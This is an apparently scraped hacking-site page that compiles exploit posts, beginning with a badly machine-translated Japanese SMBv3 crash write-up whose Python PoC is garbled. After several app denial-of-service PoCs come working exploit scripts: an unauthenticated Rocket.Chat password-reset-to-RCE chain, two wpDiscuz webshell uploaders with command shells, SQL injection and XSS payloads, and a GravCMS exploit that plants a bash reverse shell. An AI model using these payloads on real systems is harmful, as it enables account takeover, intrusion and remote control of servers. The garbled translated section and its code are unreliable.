-----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="exp_second" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="sExpires" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Category1" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Category2" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="url_title" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="description" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Keywords" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="Image" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="custom_1" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="custom_2" -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="save" Save -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="app_mode" async -----------------------------1356274838636633083297009973 Content-Disposition: form-data; name="_txp_token" 346eeab2db04acf953d13529f6be3a74 -----------------------------1356274838636633083297009973--
HireHackking
0x01序文
昨年末、SMBプロトコルを見つけるためにエミュレータが設定されたとき、大企業に対するこのような単純で非常に効果的な攻撃が発見されたことが脆弱性が発見されました。 TL; DR:サービスの拒否エラーにより、BSODプロトコルはWindows 8.1およびWindows Server 2012 R2コンピューターに単一のパケットを送信できます。

0x02テスト環境
影響を受けるシステム:
・Windows8.1(x86)
・Windows Server 2012 R2(x64)

0x03背景知識
この脆弱性の根本原因を理解するには、SMBパケットがどのように構造化されているかを理解する必要があります。 SMBV1プロトコルヘッダーファイルを見てみましょう。


プロトコルフィールドがFFバイトから始まるのを見たように、SMBV2を見てみましょう

プロトコルフィールドは現在、FEバイトから始まるので、SMBV3はどうですか? SMBプロトコルのV3バージョンは既に暗号化されており、暗号化された通信にSMB2_Transformの特定のヘッダーを使用します。

SMBV3セッションの交渉はSMBV2セッションから始まることを公式ドキュメントで学ぶことができるため、SMBV3は常に暗号化されています。 SMBV3セッションをセットアップするときに関係するパケットは次のとおりです。

1〜8バイトのパケットで、SMBヘッダーは次のようになります。

使用されるバイトシーケンスはまだ0xfeであり、これは公式のMicrosoftドキュメントに示されているSMBV2のコードであることがわかります。
バイト9から始まると、暗号化は接続された状態にあり、ヘッダーで使用されるバイトシーケンスは0xfd になります
POCでわかるように、最初のセッション中に0xFDヘッダーを備えたSMBパケットがすぐに送信されると、カーネルのクラッシュが発生します。さて、このクラッシュの根本原因を理解するために、クラッシュダンプメカニズムを掘り下げましょう。

0x04ルール原因分析
Windows 8.1(x86)でのみ実行されて根本原因を分析すると、特定のパケットを送信すると、アドレス0x00000030で保護された値(空のページ保護)をメモリから読み取るため、カーネルがクラッシュします。

クラッシュするモジュールは「MRXSMB.SYS」です。これは、Microsoft Server Message Block(SMB)のResizerです。クラッシュの正確な位置はMRXSMBです! SMBWKSRECEIVEEVENT + 8539。[ECX + 30H]からEAXへのオフセットで、ECXの値は0x00000000を指します。 IDAを通るフローを分析するとき、それは次のようになります。パケットを処理し、暗号化が有効になっているかどうかを確認します。
3.0関連

Windbgでは、次のように見えます。

基本的に、暗号化が有効になっているかどうかを確認します。この場合、「エラー」パスに従い、次の関数に移動します。

いくつかの比較手順を実行し、2番目の最後の命令は、ECXがHEX値0x34に登録されているかどうかを確認することです。 ECXが0x34以下の場合、この場合にエラーが発生します。

「エラー」パスに従って:別の命令が発生します。その場合、レジスタEDX(攻撃者の制御可能な値)が[ESP+4C]の値よりも高い場合、「実際の」パスに従います。

さまざまなレジスタの値:

次の命令では、ECXの値を再び0x34に比較します。ECXが0x34よりも高い場合、「実際の」パスに従います

この場合、ECXの値は0x34よりも高いため、実際のパスに従います。次の命令ブロックでは、_MICROSOFT_WINDOWS_SMBCLIENTENABLEBITS '値0x80000000の間の値をテストします。 Windbgでは、テストが「エラー」になることがわかります。これにより、「エラー」パスに従います。

常に「真」であるテスト指示を受け入れるように導く

loca0f20e05関数を使用する代わりに、ゼロをスタックの後ろに置きます。その場合、 "loca0f20e15"を実行します。ECX + 30HをEAXに移動する命令で、ECXが0x000000000であるためにクラッシュが発生します。

これにより、カーネルがクラッシュし、マシンの再起動を強制します。

0x05 POC
を使用します Import SocketServer
binasciiからインポートUnexlifyから
ペイロード='000000ECFD534D424141414141414141414141414141414141414141414 141414141414141414141414141414141414141414141414141414141414 141414141414141414141414141414141414141414141414141414141414 1414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 414141414141414141414141414141414141414141414141414141414141 ''
Class Byebye(socketserver.baserequesthandler):
defハンドル(自己):
try:
'from:'、self.client_addressを印刷します
印刷'[*]ペイロードの送信.'
self.request.send(unsexlify(ペイロード))
例外を除く:
印刷「BSODトリガーオン」、self.client_address
合格
socketserver.tcpserver.allow_reuse_address=1
起動=socketserver.tcpserver(( ''、445)、byebye)
launch.serve_forever()

0x06脆弱性の再発
1。KALIでスクリプトを実行します

2.次に、Windows 2012 R2で共有アドレス: \\ 10.0.0.217にアクセスすると、すぐにオペレーティングシステムのブルースクリーンが表示されます。

HireHackking

memono Notepad Version 4.2 - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: memono Notepad Version 4.2 - Denial of Service (PoC) # Date: 06-09-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/es/app/memono-bloc-de-notas/id906470619 # Version: 4.2 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
HireHackking

My Notes Safe 5.3 - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: My Notes Safe 5.3 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/my-notes-safe/id689971781 # Version: 5.3 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
HireHackking

Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: Sticky Notes & Color Widgets 1.4.2 - Denial of Service (PoC) # Date: 06-04-2021 # Author: Geovanni Ruiz # Download Link: https://apps.apple.com/us/app/sticky-notes-color-widgets/id1476063010 # Version: 1.4.2 # Category: DoS (iOS) ##### Vulnerability ##### Color Notes is vulnerable to a DoS condition when a long list of characters is being used when creating a note: # STEPS # # Open the program. # Create a new Note. # Run the python exploit script payload.py, it will create a new payload.txt file # Copy the content of the file "payload.txt" # Paste the content from payload.txt twice in the new Note. # Crashed Successful exploitation will cause the application to stop working. I have been able to test this exploit against iOS 14.2. ##### PoC ##### --> payload.py <-- #!/usr/bin/env python buffer = "\x41" * 350000 try: f = open("payload.txt","w") f.write(buffer) f.close() print ("File created") except: print ("File cannot be created")
HireHackking

Rocket.Chat 3.12.1 - NoSQL Injection (Unauthenticated)

HACKER · %s · %s

# Title: Rocket.Chat 3.12.1 - NoSQL Injection to RCE (Unauthenticated) # Author: enox # Date: 06-06-2021 # Product: Rocket.Chat # Vendor: https://rocket.chat/ # Vulnerable Version(s): Rocket.Chat 3.12.1 # CVE: CVE-2021-22911 # Credits: https://blog.sonarsource.com/nosql-injections-in-rocket-chat #!/usr/bin/python import requests import string import time import hashlib import json import oathtool import argparse parser = argparse.ArgumentParser(description='RocketChat 3.12.1 RCE') parser.add_argument('-u', help='Low priv user email [ No 2fa ]', required=True) parser.add_argument('-a', help='Administrator email', required=True) parser.add_argument('-t', help='URL (Eg: http://rocketchat.local)', required=True) args = parser.parse_args() adminmail = args.a lowprivmail = args.u target = args.t def forgotpassword(email,url): payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"sendForgotPasswordEmail\\",\\"params\\":[\\"'+email+'\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/sendForgotPasswordEmail", data = payload, headers = headers, verify = False, allow_redirects = False) print("[+] Password Reset Email Sent") def resettoken(url): u = url+"/api/v1/method.callAnon/getPasswordPolicy" headers={'content-type': 'application/json'} token = "" num = list(range(0,10)) string_ints = [str(int) for int in num] characters = list(string.ascii_uppercase + string.ascii_lowercase) + list('-')+list('_') + string_ints while len(token)!= 43: for c in characters: payload='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"getPasswordPolicy\\",\\"params\\":[{\\"token\\":{\\"$regex\\":\\"^%s\\"}}]}"}' % (token + c) r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False) time.sleep(0.5) if 'Meteor.Error' not in r.text: token += c print(f"Got: {token}") print(f"[+] Got token : {token}") return token def changingpassword(url,token): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\"]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "error" in r.text: exit("[-] Wrong token") print("[+] Password was changed !") def twofactor(url,email): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() payload ='{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"user\\":{\\"email\\":\\"'+email+'\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}}]}"}' headers={'content-type': 'application/json'} r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print(f"[+] Succesfully authenticated as {email}") # Getting 2fa code cookies = {'rc_uid': userid,'rc_token': token} headers={'X-User-Id': userid,'X-Auth-Token': token} payload = '/api/v1/users.list?query={"$where"%3a"this.username%3d%3d%3d\'admin\'+%26%26+(()%3d>{+throw+this.services.totp.secret+})()"}' r = requests.get(url+payload,cookies=cookies,headers=headers) code = r.text[46:98] print(f"Got the code for 2fa: {code}") return code def changingadminpassword(url,token,code): payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"resetPassword\\",\\"params\\":[\\"'+token+'\\",\\"P@$$w0rd!1234\\",{\\"twoFactorCode\\":\\"'+code+'\\",\\"twoFactorMethod\\":\\"totp\\"}]}"}' headers={'content-type': 'application/json'} r = requests.post(url+"/api/v1/method.callAnon/resetPassword", data = payload, headers = headers, verify = False, allow_redirects = False) if "403" in r.text: exit("[-] Wrong token") print("[+] Admin password changed !") def rce(url,code,cmd): # Authenticating sha256pass = hashlib.sha256(b'P@$$w0rd!1234').hexdigest() headers={'content-type': 'application/json'} payload = '{"message":"{\\"msg\\":\\"method\\",\\"method\\":\\"login\\",\\"params\\":[{\\"totp\\":{\\"login\\":{\\"user\\":{\\"username\\":\\"admin\\"},\\"password\\":{\\"digest\\":\\"'+sha256pass+'\\",\\"algorithm\\":\\"sha-256\\"}},\\"code\\":\\"'+code+'\\"}}]}"}' r = requests.post(url + "/api/v1/method.callAnon/login",data=payload,headers=headers,verify=False,allow_redirects=False) if "error" in r.text: exit("[-] Couldn't authenticate") data = json.loads(r.text) data =(data['message']) userid = data[32:49] token = data[60:103] print("[+] Succesfully authenticated as administrator") # Creating Integration payload = '{"enabled":true,"channel":"#general","username":"admin","name":"rce","alias":"","avatarUrl":"","emoji":"","scriptEnabled":true,"script":"const require = console.log.constructor(\'return process.mainModule.require\')();\\nconst { exec } = require(\'child_process\');\\nexec(\''+cmd+'\');","type":"webhook-incoming"}' cookies = {'rc_uid': userid,'rc_token': token} headers = {'X-User-Id': userid,'X-Auth-Token': token} r = requests.post(url+'/api/v1/integrations.create',cookies=cookies,headers=headers,data=payload) data = r.text data = data.split(',') token = data[12] token = token[9:57] _id = data[18] _id = _id[7:24] # Triggering RCE u = url + '/hooks/' + _id + '/' +token r = requests.get(u) print(r.text) ############################################################ # Getting Low Priv user print(f"[+] Resetting {lowprivmail} password") ## Sending Reset Mail forgotpassword(lowprivmail,target) ## Getting reset token token = resettoken(target) ## Changing Password changingpassword(target,token) # Privilege Escalation to admin ## Getting secret for 2fa secret = twofactor(target,lowprivmail) ## Sending Reset mail print(f"[+] Resetting {adminmail} password") forgotpassword(adminmail,target) ## Getting reset token token = resettoken(target) ## Resetting Password code = oathtool.generate_otp(secret) changingadminpassword(target,token,code) ## Authenticting and triggering rce while True: cmd = input("CMD:> ") code = oathtool.generate_otp(secret) rce(target,code,cmd)
HireHackking
# Exploit Title: Wordpress Plugin wpDiscuz 7.0.4 - Arbitrary File Upload (Unauthenticated) # Google Dork: inurl:/wp-content/plugins/wpdiscuz/ # Date: 2021-06-06 # Original Author: Chloe Chamberland # Exploit Author: Juampa Rodríguez aka UnD3sc0n0c1d0 # Vendor Homepage: https://gvectors.com/ # Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip # Version: 7.0.4 # Tested on: Ubuntu / WordPress 5.6.2 # CVE : CVE-2020-24186 #!/bin/bash if [ -z $1 ] then echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n" exit 0 elif [ -z $2 ] then echo -e "\n[i] Usage: exploit.sh [IP] [/index.php/2021/06/06/post]\n" exit 0 else post=$(curl -sI http://$1$2/ | head -n1) if [[ "$post" == *"200 OK"* ]]; then wmu_nonce=$(curl -s http://$1$2/ | sed -r "s/wmuSecurity/\nwmuSecurity/g" | grep wmuSecurity | cut -d '"' -f3) webshell=$(curl -isk -X 'POST' -H 'X-Requested-With: XMLHttpRequest' -H 'Content-Type: multipart/form-data; boundary=---------------------------WebKitFormBoundaryUnD3s' --data-binary $'-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"action\"\x0d\x0a\x0d\x0awmuUploadFiles\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_nonce\"\x0d\x0a\x0d\x0a'$wmu_nonce$'\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmuAttachmentsData\"\x0d\x0a\x0d\x0aundefined\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\"a.php\" Content-Type: image/jpeg\x0d\x0a\x0d\x0aGIF8\x0d\x0a<?php\x0d\x0aif(isset($_REQUEST[\'cmd\'])){\x0d\x0a $cmd = ($_REQUEST[\'cmd\']);\x0d\x0a system($cmd);\x0d\x0a die;\x0d\x0a}\x0d\x0a?>\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s\x0d\x0aContent-Disposition: form-data; name=\"postId\"\x0d\x0a\x0d\x0a18\x0d\x0a-----------------------------WebKitFormBoundaryUnD3s--\x0d\x0a' http://$1/wp-admin/admin-ajax.php | sed 's/\":"\http/\nhttp/g' | grep "http\:\\\\/" | cut -d '"' -f1 | sed 's/\\//g') echo -e "\nWebshell:" $webshell"\n" echo -e "--------------WIN--------------" echo -e " ¡Got webshell! " echo -e "-------------------------------\n" while : do read -p '$ ' command curl -s $webshell?cmd=$command | grep -v GIF8 done else echo -e "\n[!] The indicated post was not found\n" fi fi
HireHackking

NBMonitor 1.6.8 - Denial of Service (PoC)

HACKER · %s · %s

# Exploit Title: NBMonitor 1.6.8 - Denial of Service (PoC) # Date: 07/06/2021 # Author: Erick Galindo # Vendor Homepage: http://www.nsauditor.com # Software Link: http://www.nbmonitor.com/downloads/nbmonitor_setup.exe # Version: 1.6.8 # Tested on: Windows 10 Pro x64 es # Proof of Concept: #1.- Copy printed "AAAAA..." string to clipboard! #2.- Go to Register > Enter Registration Code... #3.- Write anything in 'Name' field #4.- Paste clipboard in 'Key' field #5.- Click on button -> Ok buffer = "\x41" * 256 f = open ("NBM.txt", "w") f.write(buffer) f.close()
HireHackking
# Exploit Title: WordPress Plugin wpDiscuz 7.0.4 - Remote Code Execution (Unauthenticated) # Date: 2021/06/08 # Exploit Author: Fellipe Oliveira # Vendor Homepage: https://gvectors.com/ # Software Link: https://downloads.wordpress.org/plugin/wpdiscuz.7.0.4.zip # Version: wpDiscuz 7.0.4 # Tested on: Debian9, Windows 7, Windows 10 (Wordpress 5.7.2) # CVE : CVE-2020-24186 # Thanks for the great contribution to the code: Z3roC00l (https://twitter.com/zeroc00I) #!/bin/python3 import requests import optparse import re import random import time import string import json parser = optparse.OptionParser() parser.add_option('-u', '--url', action="store", dest="url", help="Base target host: http://192.168.1.81/blog") parser.add_option('-p', '--path', action="store", dest="path", help="Path to exploitation: /2021/06/blogpost") options, args = parser.parse_args() if not options.url or not options.path: print('[+] Specify an url target') print('[+] Example usage: exploit.py -u http://192.168.1.81/blog -p /wordpress/2021/06/blogpost') print('[+] Example help usage: exploit.py -h') exit() session = requests.Session() main_url = options.url path = options.path url_blog = main_url + path clean_host = main_url.replace('http://', '').replace('/wordpress','') def banner(): print('---------------------------------------------------------------') print('[-] Wordpress Plugin wpDiscuz 7.0.4 - Remote Code Execution') print('[-] File Upload Bypass Vulnerability - PHP Webshell Upload') print('[-] CVE: CVE-2020-24186') print('[-] https://github.com/hevox') print('--------------------------------------------------------------- \n') def csrfRequest(): global wmuSec global wc_post_id try: get_html = session.get(url_blog) response_len = str(len(get_html.text)) response_code = str(get_html.status_code) print('[+] Response length:['+response_len+'] | code:['+response_code+']') raw_wmu = get_html.text.replace(',','\n') wmuSec = re.findall('wmuSecurity.*$',raw_wmu,re.MULTILINE)[0].split('"')[2] print('[!] Got wmuSecurity value: '+ wmuSec +'') raw_postID = get_html.text.replace(',','\n') wc_post_id = re.findall('wc_post_id.*$',raw_postID,re.MULTILINE)[0].split('"')[2] print('[!] Got wmuSecurity value: '+ wc_post_id +' \n') except requests.exceptions.ConnectionError as err: print('\n[x] Failed to Connect in: '+url_blog+' ') print('[x] This host seems to be Down') exit() def nameRandom(): global shell_name print('[+] Generating random name for Webshell...') shell_name = ''.join((random.choice(string.ascii_lowercase) for x in range(15))) time.sleep(1) print('[!] Generated webshell name: '+shell_name+'\n') return shell_name def shell_upload(): global shell print('[!] Trying to Upload Webshell..') try: upload_url = main_url + "/wp-admin/admin-ajax.php" upload_cookies = {"wordpress_test_cookie": "WP%20Cookie%20check", "wpdiscuz_hide_bubble_hint": "1"} upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "*/*", "Accept-Language": "pt-BR,pt;q=0.8,en-US;q=0.5,en;q=0.3", "Accept-Encoding": "gzip, deflate", "X-Requested-With": "XMLHttpRequest", "Content-Type": "multipart/form-data; boundary=---------------------------2032192841253859011643762941", "Origin": "http://"+clean_host+"", "Connection": "close", "Referer": url_blog} upload_data = "-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"action\"\r\n\r\nwmuUploadFiles\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_nonce\"\r\n\r\n"+wmuSec+"\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmuAttachmentsData\"\r\n\r\n\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"wmu_files[0]\"; filename=\""+shell_name+".php\"\r\nContent-Type: image/png\r\n\r\nGIF689a;\r\n\r\n<?php system($_GET['cmd']); ?>\r\n\x1a\x82\r\n-----------------------------2032192841253859011643762941\r\nContent-Disposition: form-data; name=\"postId\"\r\n\r\n"+wc_post_id+"\r\n-----------------------------2032192841253859011643762941--\r\n" check = session.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) json_object = (json.loads(check.text)) status = (json_object["success"]) get_path = (check.text.replace(',','\n')) shell_pret = re.findall('url.*$',get_path,re.MULTILINE) find_shell = str(shell_pret) raw = (find_shell.replace('\\','').replace('url":"','').replace('\',','').replace('"','').replace('[\'','')) shell = (raw.split(" ",1)[0]) if status == True: print('[+] Upload Success... Webshell path:' +shell+' \n') else: print('[x] Failed to Upload Webshell in: '+ url_blog +' ') exit() except requests.exceptions.HTTPError as conn: print('[x] Failed to Upload Webshell in: '+ url_blog +' ') return shell def code_exec(): try: while True: cmd = input('> ') codex = session.get(shell + '?cmd='+cmd+'') print(codex.text.replace('GIF689a;','').replace('�','')) except: print('\n[x] Failed to execute PHP code...') banner() csrfRequest() nameRandom() shell_upload() code_exec()
HireHackking

OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting

HACKER · %s · %s

# Exploit Title: OpenCart 3.0.3.6 - 'subject' Stored Cross-Site Scripting # Date: 2021/08/06 # Exploit Author: Mert Daş # Vendor Homepage: https://www.opencart.com/ # Software Link: https://www.opencart.com/index.php?route=cms/download # Version: 3.0.3.7 # Tested on: Windows 10 Stored Cross-site scripting(XSS): Stored XSS, also known as persistent XSS, is the more damaging of the two. It occurs when a malicious script is injected directly into a vulnerable web application. Attack vector: This vulnerability can results attacker to inject the XSS payload in Subject field of the mail and each time any user will open that mail of the website, the XSS triggers and attacker can able to steal the cookie according to the crafted payload. Vulnerable Parameters: Subject of mail. Steps-To-Reproduce: 1. Go to the opencart admin page. 2. Now go to the Marketing-Mail option. 3. Put the below payload in subject field of the Mail : "<script>alert(11111)</script>" 5. Now click on send button. 6. The XSS will be triggered. POST /opencart/admin/index.php?route=marketing/contact/send&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t HTTP/1.1 Host: 127.0.0.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0 Accept: application/json, text/javascript, */*; q=0.01 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 187 Origin: http://127.0.0.1 Connection: close Referer: http://127.0.0.1/opencart/admin/index.php?route=marketing/contact&user_token=xdMb2w0inuUPADXGigfCtsIMM0RgQ83t Cookie: language=en-gb; currency=EUR; OCSESSID=b21a152616460d44029878c9a0 store_id=0&to=customer_all&customer_group_id=1&customers=&affiliates=&products=&subject=%3Cscript%3Ealert(1)%3C%2Fscript%3E&message=&=&=&=http%3A%2F%2F&=on&files=&=&=&=&=&file=&=&=&=_self
HireHackking

Student Result Management System 1.0 - 'class' SQL Injection

HACKER · %s · %s

# Exploit Title: Student Result Management System 1.0 - 'class' SQL Injection # Date: 09.09.2020 # Exploit Author: Riadh Benlamine (rbn0x00) # Vendor Homepage : https://projectworlds.in # Software Page: https://projectworlds.in/free-projects/php-projects/student-result-management-system-project-in-php/ # Version: 1.0 # Category: Webapps # Tested on: Apache2+MariaDB latest version # Description : student.php is prone to an SQL-injection vulnerability because it fails to sanitize user input before pushing it into SQL query.Exploiting this issue could allow the attacker to compromise the server. The vulnerable parameter uri: /srms/student.php?class=<injection point> exploit: Parameter: class (GET) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment) Payload: class=-6346' OR 3657=3657#&rn=1 Type: error-based Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: class=1' OR (SELECT 3201 FROM(SELECT COUNT(*),CONCAT(0x71786a7171,(SELECT (ELT(3201=3201,1))),0x71766b7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- hNXT&rn=1 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: class=1' AND (SELECT 1049 FROM (SELECT(SLEEP(5)))gIdB)-- yYYR&rn=1 Type: UNION query Title: MySQL UNION query (random number) - 7 columns Payload: class=1' UNION ALL SELECT 8674,8674,8674,CONCAT(0x71786a7171,0x45414967666b57777145704f476d6566766d6f694d707561566e6150744d73505370466e7a6c784c,0x71766b7a71),8674,8674,8674#&rn=1
HireHackking
# Exploit Title: GravCMS 1.10.7 - Arbitrary YAML Write/Update (Unauthenticated) (2) # Original Exploit Author: Mehmet Ince # Vendor Homepage: https://getgrav.org # Version: 1.10.7 # Tested on: Debian 10 # Author: legend #/usr/bin/python3 import requests import sys import re import base64 target= "http://192.168.1.2" #Change base64 encoded value with with below command. #echo -ne "bash -i >& /dev/tcp/192.168.1.3/4444 0>&1" | base64 -w0 payload=b"""/*<?php /**/ file_put_contents('/tmp/rev.sh',base64_decode('YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjEuMy80NDQ0IDA+JjE='));chmod('/tmp/rev.sh',0755);system('bash /tmp/rev.sh'); """ s = requests.Session() r = s.get(target+"/admin") adminNonce = re.search(r'admin-nonce" value="(.*)"',r.text).group(1) if adminNonce != "" : url = target + "/admin/tools/scheduler" data = "admin-nonce="+adminNonce data +='&task=SaveDefault&data%5bcustom_jobs%5d%5bncefs%5d%5bcommand%5d=/usr/bin/php&data%5bcustom_jobs%5d%5bncefs%5d%5bargs%5d=-r%20eval%28base64_decode%28%22'+base64.b64encode(payload).decode('utf-8')+'%22%29%29%3b&data%5bcustom_jobs%5d%5bncefs%5d%5bat%5d=%2a%20%2a%20%2a%20%2a%20%2a&data%5bcustom_jobs%5d%5bncefs%5d%5boutput%5d=&data%5bstatus%5d%5bncefs%5d=enabled&data%5bcustom_jobs%5d%5bncefs%5d%5boutput_mode%5d=append' headers = {'Content-Type': 'application/x-www-form-urlencoded'} r = s.post(target+"/admin/config/scheduler",data=data,headers=headers)
HireHackking
# Exploit Title: WordPress Plugin visitors-app 0.3 - 'user-agent' Stored Cross-Site Scripting (XSS) # Date: 09/06/2021 # Exploit Author: Mesut Cetin # Vendor Homepage: https://profiles.wordpress.org/domingoruiz/ # Software Link: https://wordpress.org/plugins/visitors-app/ # Version: 0.3 # Tested on: Debian GNU/Linux 10 # Reference: https://wpscan.com/vulnerability/06f1889d-8e2f-481a-b91b-3a8008e00ffc ## Description: # A vulnerability in the Wordpress plugin "visitors" version 0.3 and prior allows remote attacker through # Cross-Site Scripting (XSS) to redirect administrators and visitors and potentially obtain sensitive informations # The 'user-agent' parameter allows attacker to escalate their privileges. ## PoC # Replace google.com with malicious attacker page curl -i http://localhost/wordpress --user-agent "</script><script>location=([]+/http:\\google.com/g).substr(1,19); </script>" # on http://localhost/wordpress/wp-admin, browse the tab "visitors"